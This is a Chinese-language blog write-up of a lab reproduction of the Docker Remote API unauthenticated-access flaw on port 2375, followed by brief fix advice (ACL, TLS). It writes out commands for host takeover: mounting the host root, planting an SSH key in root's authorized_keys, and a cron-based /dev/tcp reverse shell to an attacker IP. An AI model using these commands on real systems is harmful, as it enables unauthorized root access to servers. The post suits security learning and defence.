Docker未授权漏洞复现(合天网安实验室)

最新推荐文章于 2024-06-11 17:05:35 发布
最新推荐文章于 2024-06-11 17:05:35 发布
阅读量1.3k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: docker 容器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/127953302
版权

简介

Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。

一个完整的Docker有以下几个部分组成:

1.DockerClient客户端

2.Docker Daemon守护进程

3.Docker Image镜像

4.DockerContainer容器

漏洞成因

  又叫Docker Remote API未授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount)

漏洞影响

攻击者利用 dockerclient 或者 http 直接请求就可以访问这个API,可能导致敏感信息泄露,也可以删除Docker上的数据。攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。

实验环境

目标机器: CentOS7+Docker、IP:10.1.1.200

攻击机器:Kali+Docker、IP:10.1.1.100

1.通过nmap对目标进行信息收集,发现如下端口开放

22端口:ssh默认端口

2375端口:docker远程操控(通过这个端口对远程docker deaom进行操作)

nmap -p- -sV T4 10.1.1.200


 2. 已知目标开放2375端口,通过浏览器进行访问,

如果页面显示message "page not found" 代表存在漏洞

10.1.1.200:2375

3. 如若页面空白显示
01.可以通过info获取docker信息

10.1.1.200:2375/info

 02.获取image列表

进行docker未授权访问漏洞利用

1. 使用docker命令连接目标机器

01.通过docker client使用-H参数连接目标主机的docker,

并使用ps -a命令查询目标系统运行的所有容器

docker -H tcp://10.1.1.200 ps -a      #列出所有容器

列出所有镜像:docker -H tcp://10.1.1.200 images

进入容器的方法一:

01.首先docker client连接目标,ps -a 查看哪些容器已经停止

 02.通过start命令启动一个已经停止的容器

docker H tcp://10.1.1.200 start 3dc8d67b679d

 03.attach命令连接一个已经启动容器

docker H tcp://10.1.1.200 attach  3dc8d67b679d

这样就能够获得一个docker容器的shell

方法二:

新运行一个容器并将entrypoint设置为/bin/bash或者/bin/sh,挂载点设置为服务器的根目录挂载至/mnt目录下(需要root权限启动docker)

docker -H tcp://10.1.1.200 run -it -v /:/mnt--entrypoint /bin/bash 4c9608fd76ba(镜像id)

Docker未授权写入ssh公钥获得shell

01.启动一个容器,挂载宿主机的/mnt目录(上一步骤已挂载),之后将攻击者的ssh公钥~/.ssh/id_rsa.pub的内容写到入宿主机的/root/.ssh/authorized_keys文件中,之后就可以用root账户直接登录了。

首先kali生成id_rsa公钥:ssh-keygen -t rsa

02.查看密钥

cat  /root/.ssh/id_rsa.pub

 03.将生成公钥写入到目标/root/.ssh/authorized_keys文件中:

先进入容器:docker -H tcp://10.1.1.200 run -it -v /:/mnt--entrypoint /bin/bash 4c9608fd76ba

将生成公钥写入到目标/root/.ssh/authorized_keys文件中:

>这个代表的意思为覆盖,>>代表为追加
此处的路径为之前所挂载的路径,如果挂载root路径那就为/root/root/.ssh

写入后即可通过ssh进行连接,获取宿主机的shell:

ssh root@10.1.1.200 -i id_rsa

Docker未授权写定时任务获得shell

启动一个容器,挂载宿主机的目录(此前已挂载),之后将反弹shell的脚本写入到/etc/crontab中,攻击机nc -lvvp port会得到一个反弹的shell。

将反弹shell的脚本写入到/var/spool/cron/root(centos系统)或/var/spool/cron/crontabs/root(ubuntu系统)

1.Kali开启监听:nc -lvvp 1212

2.写入反弹shell的脚本

echo"* * * * * /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1" > /mnt/var/spool/cron/root
#*****为定时任务 此处为每分钟执行一次 /bin/bash -i >& /dev/tcp/10.1.1.101/1212 0>&1

获得目标shell

 

修复建议

1.设置ACL,只允许信任ip连接对应端口
2.开启TLS,使用生成的证书进行认证:
https://docs.docker.com/engine/security/protect-access/

如有问题,欢迎留言。

- Time
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2156
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker Remote API授权访问
lyink001的博客
12-16 1294
docker remote api获取服务器权限
Docker授权访问漏洞详解
最新发布
m0_64481831的博客
06-11 1119
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
Docker_remote_api授权访问漏洞
weixin_46564680的博客
10-13 2116
Docker_remote_api授权访问漏洞 docker_remote_api简介: docker remote api主要的目的是取代命令行界面, docker client和docker daemon通过unix domain socket进行通信. 默认情况下,只有本机的root和docker组用户才能操作docker. 漏洞成因: dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375 docker守护进程监听在0.0.0.0,外
docker api授权导致rce 漏洞
core815的专栏
05-26 1597
docker api授权导致rce 漏洞
Docker API 授权访问 getshell——漏洞
W小哥
10-22 4834
一、Docker介绍 Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。 二、Docker API 授权访问介绍 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6 因为权限控制等问题导致可以通过 docker client 或
Docker Remote API 授权漏洞全球探测1
08-03
漏洞的起因是,有一位同学在使用 docker swarm 的时候,发了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
docker-node-container:Docker实验室
05-15
目录: server.js package.json package-lock.json Docker文件docker-compose.yml节点服务器说明基本上,它具有一个非常简单的节点表示服务器,该服务器在端口5000上运行,并与Redis DB进行通信。 您可以将此代码与...
漏洞 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4869
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4803
配置开启Docker2375远程连接与解决Docker授权访问漏洞
[Shell]Docker remote api授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 686
0x01 简介 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api授权访问的攻击原理与之前的Redis授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
DOCKER REMeOTE API 授权访问漏洞
weixin_43061533的博客
12-01 708
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
常见授权访问漏洞
qq_41945550的博客
06-02 4586
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
Docker授权访问漏洞
Kevin's Blog
08-03 8135
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞概况二、攻击过程2.1 信息收集2.2 漏洞探测2.3 漏洞利用三、防御方法 一、漏洞介绍 1.1 漏洞成因   又叫Docker Remote API授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount) 1.2 漏洞概况 fofa搜索全国端口占有概况
全笔记-Docker daemon api 授权访问漏洞及利用
NoooEmotion的博客
02-07 1401
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值